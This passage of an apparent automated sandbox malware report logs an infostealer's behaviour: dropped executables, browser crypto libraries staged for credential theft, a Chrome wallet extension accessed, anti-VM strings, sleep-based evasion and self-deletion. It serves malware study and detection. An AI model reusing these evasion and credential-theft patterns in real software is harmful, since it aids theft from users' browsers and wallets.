                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: msvcr100.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: webio.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: mozglue.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: Binary string: mozglue.pdbP source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
                    Source: Binary string: freebl3.pdb source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
                    Source: Binary string: freebl3.pdbp source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
                    Source: Binary string: nss3.pdb@ source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
                    Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.12.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.12.dr, vcruntime140.dll.12.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.12.dr, msvcp140[1].dll.12.dr
                    Source: Binary string: nss3.pdb source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr
                    Source: Binary string: mozglue.pdb source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
                    Source: Binary string: softokn3.pdb source: softokn3[1].dll.12.dr

                    Data Obfuscation

                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeUnpacked PE file: 0.2.xvJv1BpknZ.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\AppData\Roaming\etrtabdUnpacked PE file: 6.2.etrtabd.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeUnpacked PE file: 7.2.5876.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeUnpacked PE file: 7.2.5876.exe.400000.0.unpack
                    Source: sqls[1].dll.12.drStatic PE information: section name: .00cfg
                    Source: freebl3.dll.12.drStatic PE information: section name: .00cfg
                    Source: freebl3[1].dll.12.drStatic PE information: section name: .00cfg
                    Source: mozglue.dll.12.drStatic PE information: section name: .00cfg
                    Source: mozglue[1].dll.12.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.12.drStatic PE information: section name: .didat
                    Source: msvcp140[1].dll.12.drStatic PE information: section name: .didat
                    Source: nss3.dll.12.drStatic PE information: section name: .00cfg
                    Source: nss3[1].dll.12.drStatic PE information: section name: .00cfg
                    Source: softokn3.dll.12.drStatic PE information: section name: .00cfg
                    Source: softokn3[1].dll.12.drStatic PE information: section name: .00cfg
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_00402CD7 push cs; retf 0_2_00402CD8
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_00401EA7 push 0000000Eh; retf 0038h0_2_00401EB6
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_004033B6 push eax; ret 0_2_00403419
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_02111F0E push 0000000Eh; retf 0038h0_2_02111F1D
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_02112D3E push cs; retf 0_2_02112D3F
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_02153622 push edx; retf 0_2_02153626
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_0215795A push 0000000Eh; retf 0038h0_2_02157969
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_02158B40 push eax; ret 0_2_02158B41
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_0215D996 push 0000002Ah; iretd 0_2_0215D9E0
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_021574B7 push ss; iretw 0_2_021574C9
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_021584CC push cs; retf 0_2_021584CD
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_021578EA push cs; retf 0038h0_2_02157969
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_00402CD7 push cs; retf 6_2_00402CD8
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_00401EA7 push 0000000Eh; retf 0038h6_2_00401EB6
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_004033B6 push eax; ret 6_2_00403419
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_020C1F0E push 0000000Eh; retf 0038h6_2_020C1F1D
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_020C2D3E push cs; retf 6_2_020C2D3F
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_02203927 push edx; retf 6_2_02203BC6
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_0220DF36 push 0000002Ah; iretd 6_2_0220DF80
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_02208A6C push cs; retf 6_2_02208A6D
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_02207A57 push ss; iretw 6_2_02207A69
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_02207E8A push cs; retf 0038h6_2_02207F09
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_022090E0 push eax; ret 6_2_022090E1
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_02207EFA push 0000000Eh; retf 0038h6_2_02207F09
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_0214030D push ecx; ret 7_2_02140315
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeCode function: 11_2_0427B010 push edx; ret 11_2_0427B21F
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeCode function: 11_2_0427A910 push edx; ret 11_2_0427A91B
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeFile created: C:\Users\user\AppData\Local\Temp\katDDA4.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dllJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5876.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\msvcp140.dllJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\etrtabdJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dllJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\EE6.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqls[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dllJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\xvjv1bpknz.exeJump to behavior
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\etrtabd:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara matchFile source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\etrtabdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_007A2D2F rdtsc 7_2_007A2D2F
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 481Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1153Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 774Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 351Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 377Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3695Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 875Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\ProgramData\FBGIDHCAAKEB\nss3.dll
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\ProgramData\FBGIDHCAAKEB\freebl3.dll
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\ProgramData\FBGIDHCAAKEB\softokn3.dll
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqls[1].dll
                    Source: C:\Windows\explorer.exe TID: 7556 Thread sleep count: 481 > 30
                    Source: C:\Windows\explorer.exe TID: 7564 Thread sleep count: 1153 > 30
                    Source: C:\Windows\explorer.exe TID: 7564 Thread sleep time: -115300s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 7560 Thread sleep count: 774 > 30
                    Source: C:\Windows\explorer.exe TID: 7560 Thread sleep time: -77400s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 7900 Thread sleep count: 351 > 30
                    Source: C:\Windows\explorer.exe TID: 7900 Thread sleep time: -35100s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 7896 Thread sleep count: 299 > 30
                    Source: C:\Windows\explorer.exe TID: 7904 Thread sleep count: 377 > 30
                    Source: C:\Windows\explorer.exe TID: 7904 Thread sleep time: -37700s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 7564 Thread sleep count: 3695 > 30
                    Source: C:\Windows\explorer.exe TID: 7564 Thread sleep time: -369500s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe TID: 8020 Thread sleep time: -210000s >= -30000s
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 4508 Thread sleep count: 54 > 30
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0CEBF0 PR_GetNumberOfProcessors,GetSystemInfo,12_2_6D0CEBF0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                    Source: 5876.exe, 00000007.00000003.1761083758.0000000002CDE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                    Source: IEBAAF.12.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                    Source: explorer.exe, 00000002.00000000.1403647144.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
                    Source: IEBAAF.12.drBinary or memory string: AMC password management pageVMware20,11696494690
                    Source: IEBAAF.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: IEBAAF.12.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: IEBAAF.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: IEBAAF.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: IEBAAF.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1742482875.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000949000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                    Source: explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                    Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
                    Source: IEBAAF.12.drBinary or memory string: tasks.office.comVMware20,11696494690o
                    Source: IEBAAF.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
